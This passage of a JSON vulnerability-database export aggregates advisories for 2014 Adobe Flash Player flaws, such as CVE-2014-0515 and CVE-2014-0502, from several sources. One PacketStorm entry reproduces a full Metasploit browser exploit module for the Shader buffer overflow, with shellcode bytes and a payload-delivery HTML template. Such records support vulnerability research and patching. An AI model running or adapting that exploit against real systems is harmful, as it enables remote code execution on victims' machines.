SDK\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nAdobe\r\n-----\r\nAdobe\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08apsb14-07\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\napsb14-07\uff1aSecurity updates available for Adobe Flash Player\r\n\u94fe\u63a5\uff1ahttp://helpx.adobe.com/security/products/flash-player/apsb14-07.htm", "cvss3": {}, "published": "2014-02-21T00:00:00", "title": "Adobe Flash Player\u53caAIR\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e(CVE-2014-0502)", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0502"], "modified": "2014-02-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61524", "id": "SSV:61524", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2016-10-03T15:02:00", "description": "Added: 06/24/2014 \nCVE: [CVE-2014-0515](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0515>) \nBID: [67092](<http://www.securityfocus.com/bid/67092>) \nOSVDB: [106347](<http://www.osvdb.org/106347>) \n\n\n### Background\n\nThe [Adobe Flash](<http://www.adobe.com/ca/products/flash.html>) plugin provides flash content rendering for web browsers. \n\n### Problem\n\nA buffer overflow exists due to an error in processing SWF files. The vulnerable function exists in the the DisplayShader class and can be exploited by setting a malicious Pixel Bender Filter. \n\n### Limitations\n\nThis exploit has been tested against IE 8.0 on Windows 7 SP1 and Adobe Flash 13.0.0.182 \n\n### Resolution\n\nUpdate the [Adobe Flash](<http://get.adobe.com/flashplayer/>) plugin. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2014-06-24T00:00:00", "type": "saint", "title": "Adobe Pixel Shader", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2014-06-24T00:00:00", "id": "SAINT:2A4112C17E5B168C185836416A370D6A", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/adobe_shader", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-07-28T14:33:26", "description": "Added: 06/24/2014 \nCVE: [CVE-2014-0515](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0515>) \nBID: [67092](<http://www.securityfocus.com/bid/67092>) \nOSVDB: [106347](<http://www.osvdb.org/106347>) \n\n\n### Background\n\nThe [Adobe Flash](<http://www.adobe.com/ca/products/flash.html>) plugin provides flash content rendering for web browsers. \n\n### Problem\n\nA buffer overflow exists due to an error in processing SWF files. The vulnerable function exists in the the DisplayShader class and can be exploited by setting a malicious Pixel Bender Filter. \n\n### Limitations\n\nThis exploit has been tested against IE 8.0 on Windows 7 SP1 and Adobe Flash 13.0.0.182 \n\n### Resolution\n\nUpdate the [Adobe Flash](<http://get.adobe.com/flashplayer/>) plugin. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2014-06-24T00:00:00", "type": "saint", "title": "Adobe Pixel Shader", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0515"], "modified": "2014-06-24T00:00:00", "id": "SAINT:C8CA9C3E5793B126645D3AAE09323B71", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/adobe_shader", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-15T23:25:25", "description": "Added: 06/24/2014 \nCVE: [CVE-2014-0515](<https://vulners.com/cve/CVE-2014-0515>) \nBID: [67092](<http://www.securityfocus.com/bid/67092>) \nOSVDB: [106347](<http://www.osvdb.org/106347>) \n\n\n### Background\n\nThe [Adobe Flash](<http://www.adobe.com/ca/products/flash.html>) plugin provides flash content rendering for web browsers. \n\n### Problem\n\nA buffer overflow exists due to an error in processing SWF files. The vulnerable function exists in the the DisplayShader class and can be exploited by setting a malicious Pixel Bender Filter. \n\n### Limitations\n\nThis exploit has been tested against IE 8.0 on Windows 7 SP1 and Adobe Flash 13.0.0.182 \n\n### Resolution\n\nUpdate the [Adobe Flash](<http://get.adobe.com/flashplayer/>) plugin. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2014-06-24T00:00:00", "type": "saint", "title": "Adobe Pixel Shader", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0515"], "modified": "2014-06-24T00:00:00", "id": "SAINT:1F8BAA45932612426B30F937F135FF86", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/adobe_shader", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-27T12:38:26", "description": "Added: 06/24/2014 \nCVE: [CVE-2014-0515](<https://vulners.com/cve/CVE-2014-0515>) \nBID: [67092](<http://www.securityfocus.com/bid/67092>) \nOSVDB: [106347](<http://www.osvdb.org/106347>) \n\n\n### Background\n\nThe [Adobe Flash](<http://www.adobe.com/ca/products/flash.html>) plugin provides flash content rendering for web browsers. \n\n### Problem\n\nA buffer overflow exists due to an error in processing SWF files. The vulnerable function exists in the the DisplayShader class and can be exploited by setting a malicious Pixel Bender Filter. \n\n### Limitations\n\nThis exploit has been tested against IE 8.0 on Windows 7 SP1 and Adobe Flash 13.0.0.182 \n\n### Resolution\n\nUpdate the [Adobe Flash](<http://get.adobe.com/flashplayer/>) plugin. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2014-06-24T00:00:00", "type": "saint", "title": "Adobe Pixel Shader", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0515"], "modified": "2014-06-24T00:00:00", "id": "SAINT:75FA8A298976AF8ABCE837B2A3892867", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/adobe_shader", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:19:54", "description": "", "cvss3": {}, "published": "2014-05-09T00:00:00", "type": "packetstorm", "title": "Adobe Flash Player Shader Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2014-05-09T00:00:00", "id": "PACKETSTORM:126560", "href": "https://packetstormsecurity.com/files/126560/Adobe-Flash-Player-Shader-Buffer-Overflow.html", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::BrowserExploitServer \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Adobe Flash Player Shader Buffer Overflow\", \n'Description' => %q{ \nThis module exploits a buffer overflow vulnerability in Adobe Flash Player. The \nvulnerability occurs in the flash.Display.Shader class, when setting specially \ncrafted data as its bytecode, as exploited in the wild in April 2014. This module \nhas been tested successfully on IE 6 to IE 10 with Flash 11 and Flash 12 over \nWindows XP SP3, Windows 7 SP1 and Windows 8. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Unknown', # Vulnerability discovery and exploit in the wild \n'juan vazquez' # msf module \n], \n'References' => \n[ \n['CVE', '2014-0515'], \n['BID', '67092'], \n['URL', 'http://helpx.adobe.com/security/products/flash-player/apsb14-13.html'], \n['URL', 'http://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks'], \n['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-cve-2014-0515-the-recent-flash-zero-day/' ] \n], \n'Payload' => \n{ \n'Space' => 2000, \n'DisableNops' => true, \n'PrependEncoder' => stack_adjust \n}, \n'DefaultOptions' => \n{ \n'InitialAutoRunScript' => 'migrate -f', \n'Retries' => false, \n'EXITFUNC' => \"thread\" \n}, \n'Platform' => 'win', \n'BrowserRequirements' => \n{ \n:source => /script|headers/i, \n:clsid => \"{D27CDB6E-AE6D-11cf-96B8-444553540000}\", \n:method => \"LoadMovie\", \n:os_name => Msf::OperatingSystems::WINDOWS, \n:ua_name => Msf::HttpClients::IE, \n:flash => lambda { |ver| ver =~ /^11\\./ || ver =~ /^12\\./ || (ver =~ /^13\\./ && ver <= '13.0.0.182') } \n}, \n'Targets' => \n[ \n[ 'Automatic', {} ] \n], \n'Privileged' => false, \n'DisclosureDate' => \"Apr 28 2014\", \n'DefaultTarget' => 0)) \nend \n \ndef exploit \n@swf = create_swf \nsuper \nend \n \ndef stack_adjust \nadjust = \"\\x64\\xa1\\x18\\x00\\x00\\x00\" # mov eax, fs:[0x18 # get teb \nadjust << \"\\x83\\xC0\\x08\" # add eax, byte 8 # get pointer to stacklimit \nadjust << \"\\x8b\\x20\" # mov esp, [eax] # put esp at stacklimit \nadjust << \"\\x81\\xC4\\x30\\xF8\\xFF\\xFF\" # add esp, -2000 # plus a little offset \n \nadjust \nend \n \ndef on_request_exploit(cli, request, target_info) \nprint_status(\"Request: #{request.uri}\") \n \nif request.uri =~ /\\.swf$/ \nprint_status(\"Sending SWF...\") \nsend_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'}) \nreturn \nend \n \nprint_status(\"Sending HTML...\") \ntag = retrieve_tag(cli, request) \nprofile = get_profile(tag) \nprofile[:tried] = false unless profile.nil? # to allow request the swf \nsend_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) \nend \n \ndef exploit_template(cli, target_info) \nswf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\" \nflash_payload = \"\" \nget_payload(cli,target_info).unpack(\"V*\").each do |i| \nflash_payload << \"0x#{i.to_s(16)},\" \nend \nflash_payload.gsub!(/,$/, \"\") \n \n \nhtml_template = %Q|<html> \n<body> \n<object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" /> \n<param name=\"movie\" value=\"<%=swf_random%>\" /> \n<param name=\"allowScriptAccess\" value=\"always\" /> \n<param name=\"FlashVars\" value=\"sh=<%=flash_payload%>\" /> \n<param name=\"Play\" value=\"true\" /> \n</object> \n</body> \n</html> \n| \n \nreturn html_template, binding() \nend \n \ndef create_swf \npath = ::File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2014-0515\", \"Graph.swf\" ) \nswf = ::File.open(path, 'rb') { |f| swf = f.read } \n \nswf \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/126560/adobe_flash_pixel_bender_bof.rb.txt"}], "checkpoint_advisories": [{"lastseen": "2021-12-17T12:09:10", "description": "A memory corruption vulnerability has been reported in Adobe Flash Player. The vulnerability is due to an error in Adobe Flash Player while parsing specially crafted SWF file. A remote attacker can exploit this issue by enticing a victim to open a specially crafted SWF file.", "cvss3": {}, "published": "2014-03-04T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Flash Player Memory Corruption (APSB14-07: CVE-2014-0498)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0498"], "modified": "2014-03-10T00:00:00", "id": "CPAI-2014-0974", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-28T06:41:06", "description": "A cross-site scripting vulnerability has been reported in Adobe Flash Player. The vulnerability is due to an error in the way the browser and the plug-in handle specially crafted URLs. A remote attacker can exploit this vulnerability by enticing an affected user to open a malicious web-page.", "cvss3": {}, "published": "2014-04-13T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Flash Player Cross-Site Scripting (APSB14-09: CVE-2014-0509)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0509"], "modified": "2014-04-17T00:00:00", "id": "CPAI-2014-1337", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-11-28T06:40:53", "description": "An arbitrary code execution vulnerability has been reported in Adobe Flash Player. The vulnerability is due to a buffer overflow while handling specially crafted SWF files. A remote attacker can exploit this vulnerability to execute arbitrary files on the victim's computer.", "cvss3": {}, "published": "2014-04-30T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Flash Player Buffer Overflow Arbitrary Code Execution (CVE-2014-0515)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2014-04-29T00:00:00", "id": "CPAI-2014-1492", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-28T06:42:52", "description": "A remote code execution vulnerability has been reported in Adobe Flash Player. The vulnerability is due to a use-after-free error while loading specially crafted SWF files. A remote attacker can exploit this issue by enticing the victim to open a specially crafted SWF file.", "cvss3": {}, "published": "2014-04-09T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Flash Player Use After Free Code Execution (APSB14-09: CVE-2014-0507)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0507"], "modified": "2014-04-10T00:00:00", "id": "CPAI-2014-1340", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-28T07:02:08", "description": "An information disclosure vulnerability has been reported in Adobe Flash Player. The vulnerability is due to an error in the way Adobe Flash Player handles specially crafted SWF files. A remote attacker could exploit this vulnerability by enticing a user to open an HTML document containing an embedded malformed Flash file (SWF) with an affected product.", "cvss3": {}, "published": "2014-04-10T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Flash Player Information Disclosure (APSB14-09: CVE-2014-0508)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0508"], "modified": "2014-04-16T00:00:00", "id": "CPAI-2014-1341", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-17T11:55:10", "description": "An information disclosure vulnerability has been reported in Adobe Flash Player. The vulnerability is due to an error in the way Adobe Flash Player handles specially crafted SWF files.", "cvss3": {}, "published": "2014-03-13T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Flash Player Information Disclosure (APSB14-08: CVE-2014-0504)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0504"], "modified": "2016-02-14T00:00:00", "id": "CPAI-2014-1146", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-11-28T06:42:57", "description": "A remote code execution vulnerability has been reported in Adobe Flash Player. The vulnerability is due to a use-after-free error while loading SWF files. A remote attacker can exploit this issue by enticing the victim to open a malicious web page.", "cvss3": {}, "published": "2014-04-09T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Flash Player Use After Free Code Execution (APSB14-09; CVE-2014-0506)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-0506"], "modified": "2014-04-09T00:00:00", "id": "CPAI-2014-1338", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-12-17T12:08:56", "description": "A security bypass vulnerability has been reported in Adobe Flash Player. The vulnerability is due to an error in the way Adobe Flash Player handles URLs within HTML files. A remote attacker can exploit this issue by enticing a victim to open a specially crafted HTML file.", "cvss3": {}, "published": "2014-03-13T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Flash Player Same Origin Security Bypass (APSB14-08; CVE-2014-0503)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0503"], "modified": "2014-03-16T00:00:00", "id": "CPAI-2014-1147", "href": "", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2022-11-28T06:45:37", "description": "A memory corruption vulnerability has been reported in Adobe Flash Player. The vulnerability is due to an error in Adobe Flash Player while parsing specially crafted SWF file. A remote attacker can exploit this issue by enticing a victim to open a specially crafted SWF file.", "cvss3": {}, "published": "2014-03-04T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Flash Player Memory Corruption (APSB14-07: CVE-2014-0499)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0499"], "modified": "2014-03-10T00:00:00", "id": "CPAI-2014-1054", "href": "", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2022-11-28T06:51:28", "description": "A remote code execution vulnerability has been reported in Adobe Flash Player. The vulnerability is due to a double-free condition when handling specially crafted SWF files. Successful exploitation would allow an attacker to take complete control of the affected system.", "cvss3": {}, "published": "2014-02-23T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Flash Player Double Free Remote Code Execution (APSB14-07; CVE-2014-0502)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-0502"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2014-0931", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-12-17T11:55:53", "description": "Infinity is a web exploit kit that operates by delivering a malicious payload to the victim's computer. Remote attackers can infect users with Infinity exploit kit by enticing them to visit a malicious web page. Infinity Exploit Kit installs payloads on infected computer, which could result in data leakage and remote code execution.", "cvss3": {}, "published": "2014-06-10T00:00:00", "type": "checkpoint_advisories", "title": "Infinity Exploit Kit Landing Page (CVE-2013-1347; CVE-2013-2423; CVE-2013-2465; CVE-2014-0322; CVE-2014-0502; CVE-2014-1776)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1347", "CVE-2013-2423", "CVE-2013-2465", "CVE-2014-0322", "CVE-2014-0502", "CVE-2014-1776"], "modified": "2015-07-16T00:00:00", "id": "CPAI-2014-1622", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2023-09-15T13:24:06", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Flash Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the usage of regular expressions in ActionScript where an expression could overflow a data structure on the stack. An attacker can leverage this vulnerability to execute code under the context of the current process.", "cvss3": {}, "published": "2014-04-03T00:00:00", "type": "zdi", "title": "Adobe Flash Player RegExp Stack Buffer Overflow Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0498"], "modified": "2014-04-03T00:00:00", "id": "ZDI-14-040", "href": "https://www.zerodayinitiative.com/advisories/ZDI-14-040/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-15T13:22:34", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Flash Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the usage of regular expressions in ActionScript where an expression could overflow a data structure on the stack. An attacker can leverage this vulnerability to execute code under the context of the current process.", "cvss3": {}, "published": "2014-04-08T00:00:00", "type": "zdi", "title": "Adobe Flash Player Regular Expression Stack Overflow Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0507"], "modified": "2014-04-08T00:00:00", "id": "ZDI-14-070", "href": "https://www.zerodayinitiative.com/advisories/ZDI-14-070/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-15T13:21:06", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Flash. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of ExternalInterface. By manipulating a SWF's objects an attacker can force a dangling pointer to be reused after it has been freed. An attacker can leverage this vulnerability to execute code under the context of the current process.", "cvss3": {}, "published": "2014-04-11T00:00:00", "type": "zdi", "title": "(Pwn2Own) Adobe Flash ExternalInterface Use-After-Free Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0506"], "modified": "2014-04-11T00:00:00", "id": "ZDI-14-092", "href": "https://www.zerodayinitiative.com/advisories/ZDI-14-092/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-09-20T13:52:26", "description": "Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.", "cvss3": {}, "published": "2014-04-29T10:37:00", "type": "cve", "title": "CVE-2014-0515", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0515"], "modified": "2018-12-13T16:02:00", "cpe": [], "id": "CVE-2014-0515", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0515", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-09-20T13:50:06", "description": "Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 11.7.700.275 and 11.8.x through 13.0.x before 13.0.0.182 on Windows and OS X and before 11.2.202.350 on Linux, Adobe AIR before 13.0.0.83 on Android, Adobe AIR SDK before 13.0.0.83, and Adobe AIR SDK & Compiler before 13.0.0.83 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.", "cvss3": {}, "published": "2014-04-08T23:55:00", "type": "cve", "title": "CVE-2014-0509", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, 